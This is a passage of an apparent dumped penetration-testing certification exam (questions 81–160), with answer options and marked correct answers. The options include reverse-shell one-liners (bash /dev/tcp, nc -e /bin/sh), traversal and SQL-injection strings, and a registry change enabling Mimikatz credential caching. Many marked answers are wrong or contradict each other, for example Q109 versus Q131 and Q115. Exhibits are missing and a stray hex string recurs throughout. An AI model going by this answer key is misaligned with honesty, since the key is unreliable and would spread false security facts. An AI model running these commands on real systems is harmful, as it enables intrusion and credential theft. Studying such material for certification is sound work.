C. Decompile the application.
D. Check memory allocations.
Correct Answer: D
Section: (none)
Explanation
QUESTION 81
A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The
penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to
use for this purpose? (Choose two.)
A. Tcpdump
B. Nmap
C. Wireshark
D. SSH
E. Netcat
F. Cain and Abel
Correct Answer: BD
Section: (none)
Explanation
QUESTION 82
An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor
is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the
following commands can the assessor use to find any likely Windows domain controllers?
A. dig -q any _kerberos._tcp.internal.comptia.net

B. dig -q any _lanman._tcp.internal.comptia.net
C. dig -q any _ntlm._tcp.internal.comptia.net
D. dig -q any _smtp._tcp.internal.comptia.net
Correct Answer: A
Section: (none)
Explanation
QUESTION 83
Click the exhibit button.
5833E5AE1387343E1F3F43D3D74F0096
Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques
might be used to exploit the target system? (Choose two.)
A. Arbitrary code execution

B. Session hijacking
C. SQL injection
D. Login credential brute-forcing
E. Cross-site request forgery
Correct Answer: BD
Section: (none)
Explanation
QUESTION 84
5833E5AE1387343E1F3F43D3D74F0096
A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the
following would a malicious actor do to exploit this configuration setting?
A. Use path modification to escape the application’s framework.

B. Create a frame that overlays the application.
C. Inject a malicious iframe containing JavaScript.
D. Pass an iframe attribute that is malicious.
Correct Answer: C
Section: (none)
Explanation
QUESTION 85
A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the
web application could disclose an SQL table with user account and password information. Which of the
following is the MOST effective way to notify management of this finding and its importance?
A. Document the findings with an executive summary, recommendations, and screenshots of the web
application disclosure.
B. Connect to the SQL server using this information and change the password to one or two non-critical
accounts to demonstrate a proof--of-concept to management.
C. Notify the development team of the discovery and suggest that input validation be implemented with a
professional penetration testing company.
D. Request that management create an RFP to begin a formal engagement with a professional penetration
testing company.
Correct Answer: A
Section: (none)
Explanation
QUESTION 86
A company performed an annual penetration test of its environment. In addition to several new findings, all of
the previously identified findings persisted on the latest report. Which of the following is the MOST likely
reason?
A. Infrastructure is being replaced with similar hardware and software.

B. Systems administrators are applying the wrong patches.
C. The organization is not taking action to remediate identified findings.
D. The penetration testing tools were misconfigured.
Correct Answer: C
Section: (none)
Explanation
QUESTION 87
Joe, a penetration tester, is asked to assess a company’s physical security by gaining access to its corporate
office. Joe is looking for a method that will enable him to enter the building during business hours or when there
5833E5AE1387343E1F3F43D3D74F0096
are no employees on-site. Which of the following would be the MOST effective in accomplishing this?
A. Badge cloning
B. Lock picking
C. Tailgating
D. Piggybacking
Correct Answer: A
Section: (none)
Explanation
QUESTION 88
In which of the following components is an exploited vulnerability MOST likely to affect multiple running
application containers at once?
A. Common libraries
B. Configuration files
C. Sandbox escape
D. ASLR bypass
Correct Answer: A
Section: (none)
Explanation
Reference: https://www.stackrox.com/post/2019/02/the-runc-vulnerability-a-deep-dive-on-protecting-yourself/
QUESTION 89
A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following
would define the target list?
A. Rules of engagement
B. Mater services agreement
C. Statement of work
D. End-user license agreement
Correct Answer: C
Section: (none)
Explanation
QUESTION 90
Which of the following BEST explains why it is important to maintain confidentially of any identified findings
when performing a penetration test?
A. Penetration test findings often contain company intellectual property

B. Penetration test findings could lead to consumer dissatisfaction if made public.
C. Penetration test findings are legal documents containing privileged information.
D. Penetration test findings can assist an attacker in compromising a system.
5833E5AE1387343E1F3F43D3D74F0096
Correct Answer: D
Section: (none)
Explanation
QUESTION 91
The following command is run on a Linux file system:
chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?
A. Kernel vulnerabilities
B. Sticky bits
C. Unquoted service path
D. Misconfigured sudo
Correct Answer: B
Section: (none)
Explanation
QUESTION 92
Given the following script:
Which of the following BEST describes the purpose of this script?
A. Log collection
B. Event collection
C. Keystroke monitoring
D. Debug message collection
Correct Answer: C
Section: (none)
Explanation
Reference: https://www.programcreek.com/python/example/97419/pyHook.HookManager
QUESTION 93
5833E5AE1387343E1F3F43D3D74F0096
A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will
complete this task?
A. -p-
B. -p ALL
C. -p 1-65534
D. -port 1-65534
Correct Answer: A
Section: (none)
Explanation
QUESTION 94
Which of the following vulnerabilities are MOST likely to be false positives when reported by an automated
scanner on a static HTML web page? (Choose two.)
A. Missing secure flag for a sensitive cookie

B. Reflected cross-site scripting
C. Enabled directory listing
D. Insecure HTTP methods allowed
E. Unencrypted transfer of sensitive data
F. Command injection
G. Disclosure of internal system information
H. Support of weak cipher suites
Correct Answer: FG
Section: (none)
Explanation
QUESTION 95
A software development team recently migrated to new application software on the on-premises environment.
Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to
a live or test environment, a test might be better to create the same environment on the VM. Which of the
following is MOST important for confirmation?
A. Unsecure service and protocol configuration

B. Running SMB and SMTP service
C. Weak password complexity and user account
D. Misconfiguration
Correct Answer: A
Section: (none)
Explanation
QUESTION 96
A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the
5833E5AE1387343E1F3F43D3D74F0096
tester to crack the hash using a mask attack?
A. hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt

B. hashcat -m 5600 hash.txt
C. hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a
D. hashcat -m 5600 -o results.text hash.txt wordlist.txt
Correct Answer: C
Section: (none)
Explanation
QUESTION 97
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the
following items is required?
A. The latest vulnerability scan results

B. A list of sample application requests
C. An up-to-date list of possible exploits
D. A list of sample test accounts
Correct Answer: B
Section: (none)
Explanation
QUESTION 98
A penetration tester is checking a script to determine why some basic math errors are persisting. The expected
result was the program outputting “True”.
Given the output from the console above, which of the following explains how to correct the errors in the script?
(Choose two.)
5833E5AE1387343E1F3F43D3D74F0096
A. Change ‘fi’ to ‘Endlf’.
B. Remove the ‘let’ in front of ‘dest=5+5’.
C. Change the ‘=’ to ‘-eq’.
D. Change ‘source’ and ‘dest’ to “$source” and “$dest”.
E. Change ‘else’ to ‘elif’.
Correct Answer: BD
Section: (none)
Explanation
QUESTION 99
After performing a security assessment for a firm, the client was found to have been billed for the time the
client’s test environment was unavailable. The client claims to have been billed unfairly. Which of the following
documents would MOST likely be able to provide guidance in such a situation?
A. SOW
B. NDA
C. EULA
D. BPA
Correct Answer: D
Section: (none)
Explanation
QUESTION 100
When performing compliance-based assessments, which of the following is the MOST important key
consideration?
A. Additional rate
B. Company policy
C. Impact tolerance
D. Industry type
Correct Answer: D
Section: (none)
Explanation
QUESTION 101
A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the
following command:
for m in {1..254..1};do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?
A. Port scan
5833E5AE1387343E1F3F43D3D74F0096
B. Service enumeration
C. Live host identification
D. Denial of service
Correct Answer: C
Section: (none)
Explanation
QUESTION 102
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator
installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is
available?
A. fpipe.exe -1 8080 -r 80 100.170.60.5

B. ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5
C. nmap -sS -A -f 100.170.60.5
D. nc 100.170.60.5 8080 /bin/sh
Correct Answer: B
Section: (none)
Explanation
QUESTION 103
A penetration tester ran the following Nmap scan on a computer:
nmap -aV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show
port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what
happened?
A. The organization failed to disable Telnet.

B. Nmap results contain a false positive for port 23.
C. Port 22 was filtered.
D. The service is running on a non-standard port.
Correct Answer: A
Section: (none)
Explanation
QUESTION 104
Which of the following has a direct and significant impact on the budget of the security assessment?
A. Scoping
B. Scheduling
C. Compliance requirement
5833E5AE1387343E1F3F43D3D74F0096
D. Target risk
Correct Answer: D
Section: (none)
Explanation
QUESTION 105
After several attempts, an attacker was able to gain unauthorized access through a biometrics sensor using the
attacker’s actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what
happened?
A. The biometric device is tuned more toward false positives.

B. The biometric device is configured more toward true negatives.
C. The biometric device is set to fail closed.
D. The biometric device duplicated a valid user’s fingerprint.
Correct Answer: A
Section: (none)
Explanation
QUESTION 106
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a
vulnerability scan.
The tester runs the following command:
nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130
Which of the following BEST describes why multiple IP addresses are specified?
A. The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different
subnets.
B. The tester is trying to perform a more stealthy scan by including several bogus addresses.
C. The scanning machine has several interfaces to balance the scan request across at the specified rate.
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run
against the latter host.
Correct Answer: B
Section: (none)
Explanation
QUESTION 107
Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own. Which of the following
URLs can he use to accomplish this attack?
A. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-
ACHTransfer&senderID=654846&notify=False&creditaccount=’OR 1=1 AND select username from
testbank.custinfo where username like ‘Joe’−&amount=200
5833E5AE1387343E1F3F43D3D74F0096
B. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-
ACHTransfer&senderID=654846&notify=False&creditaccount=’OR 1=1 AND select username from
testbank.custinfo where username like ‘Joe’ &amount=200
C. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-
ACHTransfer&senderID=654846&notify=True&creditaccount=’OR 1=1 AND select username from
testbank.custinfo where username like ‘Joe’ −&amount=200
D. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-
ACHTransfer&senderID=654846&notify=True&creditaccount=’AND 1=1 AND select username from
testbank.custinfo where username like ‘Joe’ −&amount=200
Correct Answer: B
Section: (none)
Explanation
QUESTION 108
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal
passwords by its employees. Which of the following is the BEST control to remediate the use of common
dictionary terms?
A. Expand the password length from seven to 14 characters.

B. Implement password history restrictions.
C. Configure password filters/
D. Disable the accounts after five incorrect attempts.
E. Decrease the password expiration window.
Correct Answer: A
Section: (none)
Explanation
QUESTION 109
A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that
contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.).
A. -O
B. -iL
C. -sV
D. -sS
E. -oN
F. -oX
Correct Answer: BE
Section: (none)
Explanation
Reference https://securitytrails.com/blog/top-15-nmap-commands-to-scan-remote-hosts#six-scan-hosts-and-ip-
addresses-reading-from-a-text-file
QUESTION 110
A security analyst has uncovered a suspicious request in the logs for a web application. Given the following
5833E5AE1387343E1F3F43D3D74F0096
URL:
http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd
Which of the following attack types is MOST likely to be the vulnerability?
A. Directory traversal
B. Cross-site scripting
C. Remote file inclusion
D. User enumeration
Correct Answer: B
Section: (none)
Explanation
QUESTION 111
A company planned for and secured the budget to hire a consultant to perform a web application penetration
test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
Code review
Updates to firewall settings
Which of the following has occurred in this situation?
A. Scope creep
B. Post-mortem review
C. Risk acceptance
D. Threat prevention
Correct Answer: A
Section: (none)
Explanation
QUESTION 112
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email
addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web
server. Which of the following BEST describes the technique that was used to obtain this information?
A. Enumeration of services
B. OSINT gathering
C. Port scanning
D. Social engineering
Correct Answer: B
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 113
During an internal penetration test, several multicast and broadcast name resolution requests are observed
traversing the network. Which of the following tools could be used to impersonate network resources and
collect authentication requests?
A. Ettercap
B. Tcpdump
C. Responder
D. Medusa
Correct Answer: C
Section: (none)
Explanation
QUESTION 114
Given the following:
http://example.com/download.php?id-.../.../.../etc/passwd
Which of the following BEST describes the above attack?
A. Malicious file upload attack

B. Redirect attack
C. Directory traversal attack
D. Insecure direct object reference attack
Correct Answer: C
Section: (none)
Explanation
QUESTION 115
A tester intends to run the following command on a target system:
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
Which of the following additional commands would need to be executed on the tester’s Linux system to make
the previous command successful?
A. nc -nlvp 443
B. nc 10.2.4.6. 443
C. nc -w3 10.2.4.6 443
D. nc -e /bin/sh 10.2.4.6. 443
Correct Answer: D
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 116
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running
Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t

REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t
REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t
REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t
REG_DWORD /d 1
Correct Answer: A
Section: (none)
Explanation
QUESTION 117
Which of the following commands would allow a penetration tester to access a private network from the Internet
in Metasploit?
A. set rhost 192.168.1.10

B. run autoroute -s 192.168.1.0/24
C. db_nmap -iL /tmp/privatehosts.txt
D. use auxiliary/server/socks4a
Correct Answer: A
Section: (none)
Explanation
Reference https://www.offensive-security.com/metasploit-unleashed/pivoting/
QUESTION 118
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of
the following BEST describes the abilities of the threat actor?
A. Advanced persistent threat

B. Script kiddie
C. Hacktivist
D. Organized crime
Correct Answer: B
Section: (none)
Explanation
Reference https://www.sciencedirect.com/topics/computer-science/disgruntled-employee
QUESTION 119
Click the exhibit button.
5833E5AE1387343E1F3F43D3D74F0096
A penetration tester is performing an assessment when the network administrator shows the tester a packet
sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
A. SNMP brute forcing

B. ARP spoofing
C. DNS cache poisoning
D. SMTP relay
Correct Answer: A
Section: (none)
Explanation
QUESTION 120
A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection.
Research indicates that completely remediating the vulnerability would require an architectural change, and the
stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of
the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)
A. Identity and eliminate inline SQL statements from the code.

B. Identify and eliminate dynamic SQL from stored procedures.
C. Identify and sanitize all user inputs.
D. Use a whitelist approach for SQL statements.
E. Use a blacklist approach for SQL statements.
5833E5AE1387343E1F3F43D3D74F0096
F. Identify the source of malicious input and block the IP address.
Correct Answer: CD
Section: (none)
Explanation
QUESTION 121
A penetration tester, who is not on the client’s network. is using Nmap to scan the network for hosts that are in
scope. The penetration tester is not receiving any response on the command:
nmap 100.100/1/0-125
Which of the following commands would be BEST to return results?
A. nmap -Pn -sT 100.100.1.0-125

B. nmap -sF -p 100.100.1.0-125
C. nmap -sV -oA output 100.100.10-125
D. nmap 100.100.1.0-125 -T4
Correct Answer: A
Section: (none)
Explanation
QUESTION 122
For which of the following reasons does a penetration tester need to have a customer’s point-of-contact
information available at all times? (Choose three.)
A. To report indicators of compromise

B. To report findings that cannot be exploited
C. To report critical findings
D. To report the latest published exploits
E. To update payment information
F. To report a server that becomes unresponsive
G. To update the statement of work
H. To report a cracked password
Correct Answer: ACF

Section: (none)
Explanation
QUESTION 123
Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To
escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?
A. LSASS
B. SAM database
5833E5AE1387343E1F3F43D3D74F0096
C. Active Directory
D. Registry
Correct Answer: C
Section: (none)
Explanation
QUESTION 124
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks
can be performed to leverage this vulnerability?
A. RID cycling to enumerate users and groups

B. Pass the hash to relay credentials
C. Password brute forcing to log into the host
D. Session hijacking to impersonate a system account
Correct Answer: D
Section: (none)
Explanation
QUESTION 125
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following
types of attacks should the tester use?
A. TCP SYN flood

B. SQL injection
C. XSS
D. XMAS scan
Correct Answer: B
Section: (none)
Explanation
Reference: https://www.softwaretestinghelp.com/getting-started-with-web-application-penetration
QUESTION 126
A penetration tester runs the following from a compromised ‘python -c ‘
import pty;pty.spawn (“/bin/bash”) ’. Which of the following actions are the tester taking?
A. Removing the Bash history

B. Upgrading the shell
C. Creating a sandbox
D. Capturing credentials
Correct Answer: B
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
Reference: https://schu.media/2017/08/05/using-reverse-shell-to-get-access-to-your-server/
QUESTION 127
A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes
the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the
findings?
A. Ensure the scanner can make outbound DNS requests.

B. Ensure the scanner is configured to perform ARP resolution.
C. Ensure the scanner is configured to analyze IP hosts.
D. Ensure the scanner has the proper plug -ins loaded.
Correct Answer: A
Section: (none)
Explanation
QUESTION 128
A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a
WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network,
but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would
BEST assist the tester in obtaining this handshake?
A. Karma attack
B. Deauthentication attack
C. Fragmentation attack
D. SSDI broadcast flood
Correct Answer: B
Section: (none)
Explanation
QUESTION 129
Which of the following is the purpose of an NDA?
A. Outlines the terms of confidentiality between both parties

B. Outlines the boundaries of which systems are authorized for testing
C. Outlines the requirements of technical testing that are allowed
D. Outlines the detailed configuration of the network
Correct Answer: A
Section: (none)
Explanation
QUESTION 130
A penetration tester has run multiple vulnerability scans against a target system. Which of the following would
be unique to a credentialed scan?
5833E5AE1387343E1F3F43D3D74F0096
A. Exploits for vulnerabilities found
B. Detailed service configurations
C. Unpatched third-party software
D. Weak access control configurations
Correct Answer: A
Section: (none)
Explanation
QUESTION 131
A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that
contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.)
A. -O
B. -iL
C. -sV
D. -sS
E. -oN
F. -oX
Correct Answer: AB
Section: (none)
Explanation
QUESTION 132
After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been
detected. He now wants to maintain persistent access to the machine. Which of the following methods would
be MOST easily detected?
A. Run a zero-day exploit.

B. Create a new domain user with a known password.
C. Modify a known boot time service to instantiate a call back.
D. Obtain cleartext credentials of the compromised user.
Correct Answer: C
Section: (none)
Explanation
QUESTION 133
A consultant is performing a social engineering attack against a client. The consultant was able to collect a
number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on
to various employees email accounts. Given the findings, which of the following should the consultant
recommend be implemented?
A. Strong password policy
5833E5AE1387343E1F3F43D3D74F0096
B. Password encryption
C. Email system hardening
D. Two-factor authentication
Correct Answer: D
Section: (none)
Explanation
QUESTION 134
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following
methods is the correct way to validate the vulnerability?
A. Download the GHOST file to a Linux system and compile

gcc -o GHOST
test i:
./GHOST
B. Download the GHOST file to a Windows system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST
C. Download the GHOST file to a Linux system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST
D. Download the GHOST file to a Windows system and compile
gcc -o GHOST
test i:
./GHOST
Correct Answer: C
Section: (none)
Explanation
QUESTION 135
A company has engaged a penetration tester to perform an assessment for an application that resides in the
company’s DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester’s
IP address be whitelisted?
A. WAF
B. HIDS
C. NIDS
D. DLP
Correct Answer: C
Section: (none)
Explanation
QUESTION 136
5833E5AE1387343E1F3F43D3D74F0096
A penetration tester has compromised a host. Which of the following would be the correct syntax to create a
Netcat listener on the device?
A. nc -lvp 4444 /bin/bash

B. nc -vp 4444 /bin/bash
C. nc -p 4444 /bin/bash
D. nc -lp 4444 –e /bin/bash
Correct Answer: A
Section: (none)
Explanation
Reference: https://netsec.ws/?p=292
QUESTION 137
During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file
with the following command:
c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.db
Which of the following file system vulnerabilities does this command take advantage of?
A. Hierarchical file system

B. Alternate data streams
C. Backdoor success
D. Extended file system
Correct Answer: B
Section: (none)
Explanation
QUESTION 138
A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and
has identified the following vulnerabilities:
XSS
HTTP DELETE method allowed
SQL injection
Vulnerable to CSRF
To which of the following should the tester give the HIGHEST priority?
A. SQL injection
B. HTTP DELETE method allowed
C. Vulnerable to CSRF
D. XSS
Correct Answer: B
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 139
A penetration tester has successfully exploited a vulnerability on an organization’s authentication server and
now wants to set up a reverse shell. The penetration tester finds that Netcat is not available on the target.
Which of the following approaches is a suitable option to attempt NEXT?
A. Run xterm to connect to the X-server of the target.

B. Attempt to escalate privileges to acquire an interactive shell.
C. Try to use the /dev/tcp socket.
D. Attempt to read out/etc/shadow.
Correct Answer: C
Section: (none)
Explanation
Reference: https://www.netsparker.com/blog/web-security/understanding-reverse-shells/
QUESTION 140
SIMULATION
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part1: Given the output, construct the command that was used to generate this output from the available
options.
Part2: Once the command is appropriately constructed, use the given output to identify the potential attack
vectors that should be investigated further.
Part1
5833E5AE1387343E1F3F43D3D74F0096
Part2
5833E5AE1387343E1F3F43D3D74F0096
Correct Answer: See explanation below.
Section: (none)
Explanation
Explanation:
Part 1 – nmap 192.168.2.2 -sV -O
Part 2 – Weak SMB file permissions
QUESTION 141
DRAG DROP
A technician is reviewing the following report. Given this information, identify which vulnerability can be
definitively confirmed to be a false positive by dragging the “false positive” token to the “Confirmed” column for
each vulnerability that is a false positive.
Select and Place:
Correct Answer:
5833E5AE1387343E1F3F43D3D74F0096
Section: (none)
Explanation
QUESTION 142
SIMULATION
You are a penetration tester reviewing a client’s website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
5833E5AE1387343E1F3F43D3D74F0096
5833E5AE1387343E1F3F43D3D74F0096
5833E5AE1387343E1F3F43D3D74F0096
5833E5AE1387343E1F3F43D3D74F0096
5833E5AE1387343E1F3F43D3D74F0096
5833E5AE1387343E1F3F43D3D74F0096
Correct Answer: See explanation below.
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
Explanation:
Step 1 - Generate a Certificate Signing Request
Step 2 - Submit CSR to the CA
Step 3 - Install re-issued certificate on the server
Step 4 - Remove Certificate from Server
QUESTION 143
DRAG DROP
Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to
have access to an isolated network that you would like to port scan.
Select and Place:
5833E5AE1387343E1F3F43D3D74F0096
Correct Answer:
5833E5AE1387343E1F3F43D3D74F0096
Section: (none)
Explanation
QUESTION 144
A senior employee received a suspicious email from another executive requesting an urgent wire transfer.
Which of the following types of attacks is likely occurring?
A. Spear phishing
B. Business email compromise
C. Vishing
D. Whaling
Correct Answer: A
Section: (none)
5833E5AE1387343E1F3F43D3D74F0096
Explanation
Reference: https://www.welivesecurity.com/2020/03/13/415pm-urgent-message-ceo-fraud/
QUESTION 145
An individual has been hired by an organization after passing a background check. The individual has been
passing information to a competitor over a period of time. Which of the following classifications BEST describes
the individual?
A. APT
B. Insider threat
C. Script kiddie
D. Hacktivist
Correct Answer: B
Section: (none)
Explanation
Reference: https://en.wikipedia.org/wiki/Insider_threat
QUESTION 146
A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have
helped the penetration tester identify this vulnerability?
A. ‘or ‘folder’ like ‘file’; ––

B. || is /tmp/
C. “><script>document.location=/root/</script>
D. && dir C:/
E. ../../../../../../../../
Correct Answer: E
Section: (none)
Explanation
Reference: https://www.sciencedirect.com/topics/computer-science/directory-traversal
QUESTION 147
A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy
requirements to perform the test after major architectural changes. Which of the following is the BEST way to
approach the project?
A. Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities.
B. Review the firewall configuration, followed by a targeted attack by a read team.
C. Perform a discovery scan to identify changes in the network.
D. Focus on an objective-based approach to assess network assets with a red team.
Correct Answer: D
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 148
During an engagement an unsecure direct object reference vulnerability was discovered that allows the
extraction of highly sensitive PII. The tester is required to extract and then exfil the information from a web
application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:
Which of the following lines of code is causing the problem?
A. url = “https://www.comptia.org?id=”
B. req = requests.get(url)
C. if req.status ==200:
D. url += i
Correct Answer: D
Section: (none)
Explanation
QUESTION 149
Which of the following actions BEST matches a script kiddie’s threat actor?
A. Exfiltrate network diagrams to perform lateral movement.

B. Steal credit cards from the database and sell them in the deep web.
C. Install a rootkit to maintain access to the corporate network.
D. Deface the website of a company in search of retribution.
Correct Answer: B
Section: (none)
Explanation
Reference: https://www.skyetechnologies.com/2020/08/20/meet-the-threat-actors-part-1-script-kid
QUESTION 150
A penetration tester has gained physical access to a facility and connected directly into the internal network.
The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?
A. Spoofing a printer’s MAC address

B. Abusing DTP negotiation
C. Performing LLMNR poisoning
D. Conducting an STP attack
Correct Answer: D
5833E5AE1387343E1F3F43D3D74F0096
Section: (none)
Explanation
QUESTION 151
During a penetration test, a tester identifies traditional antivirus running on the exploited server. Which of the
following techniques would BEST ensure persistence in a post-exploitation phase?
A. Shell binary placed in C:\windows\temp

B. Modified daemons
C. New user creation
D. Backdoored executables
Correct Answer: C
Section: (none)
Explanation
QUESTION 152
A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of
the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of
the following is the BEST method for a tester to confirm the vulnerability exists?
A. Manually run publicly available exploit code.

B. Confirm via evidence of the updated version number.
C. Run the vulnerability scanner again.
D. Perform dynamic analysis on the vulnerable service.
Correct Answer: C
Section: (none)
Explanation
QUESTION 153
A penetration tester is attempting to open a socket in a bash script but receives errors when running it. The
current state of the relevant line in the script is as follows:
Which of the following lines of code would correct the issue upon substitution?
A. open 0<>/dev/tcp/${HOST}:${PORT}
B. exec 0</dev/tcp/${HOST}/${PORT}
C. exec 0</dev/tcp/$[HOST]:$[PORT]
D. exec 3<>/dev/tcp/${HOST}/${PORT}
E. open 3</dev/tcp/${HOST}/${PORT}
F. open 3</dev/tcp/$[HOST]/$[PORT]
Correct Answer: C
5833E5AE1387343E1F3F43D3D74F0096
Section: (none)
Explanation
QUESTION 154
A tester was able to retrieve domain users’ hashes. Which of the following tools can be used to uncover the
users’ passwords? (Choose two.)
A. Hydra
B. Mimikatz
C. Hashcat
D. John the Ripper
E. PSExec
F. Nessus
Correct Answer: BE
Section: (none)
Explanation
Reference: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
QUESTION 155
When negotiating a penetration testing contract with a prospective client, which of the following disclaimers
should be included in order to mitigate liability in case of a future breach of the client’s systems?
A. The proposed mitigations and remediations in the final report do not include a cost-benefit analysis.
B. The NDA protects the consulting firm from future liabilities in the event of a breach.
C. The assessment reviewed the cyber key terrain and most critical assets of the client’s network.
D. The penetration test is based on the state of the system and its configuration at the time of assessment.
Correct Answer: D
Section: (none)
Explanation
QUESTION 156
A company’s corporate policies state that employees are able to scan any global network as long as it is done
within working hours. Government laws prohibit unauthorized scanning. Which of the following should an
employee abide by?
A. Company policies must be followed in this situation.

B. Laws supersede corporate policies.
C. Industry standards regarding scanning should be followed.
D. The employee must obtain written approval from the company’s Chief Information Security Officer (CISO)
prior to scanning.
Correct Answer: D
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 157
Which of the following commands will allow a tester to enumerate potential unquoted service paths on a host?
A. wmic environment get name, variablevalue, username | findstr /i “Path” |

findstr /i “Service”
B. wmic service get /format:hform > c:\temp\services.html
C. wmic startup get caption, location, command |findstr /i “service” |findstr /v /
i “%”
D. wmic service get name, displayname, pathname, startmode |findstr /i “auto” |
findstr /i /v “c:\windows\\” |findstr /i /v “””
Correct Answer: D
Section: (none)
Explanation
Reference: https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-ser
path-c7a011a8d8ae
QUESTION 158
A penetration tester has been hired to perform a penetration test for an organization. Which of the following is
indicative of an error-based SQL injection attack?
A. a=1 or 1––
B. 1=1 or b––
C. 1=1 or 2––
D. 1=1 or a––
Correct Answer: A
Section: (none)
Explanation
QUESTION 159
During an engagement, a consultant identifies a number of areas that need further investigation and require an
extension of the engagement. Which of the following is the MOST likely reason why the engagement may not
be able to continue?
A. The consultant did not sign an NDA.

B. The consultant was not provided with the appropriate testing tools.
C. The company did not properly scope the project.
D. The initial findings were not communicated to senior leadership.
Correct Answer: C
Section: (none)
Explanation
QUESTION 160
5833E5AE1387343E1F3F43D3D74F0096
During the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution
on a Linux web server. A cursory review confirms the system access is only in a low-privilege user context:
www-data. After reviewing, the following output from /etc/sudoers:
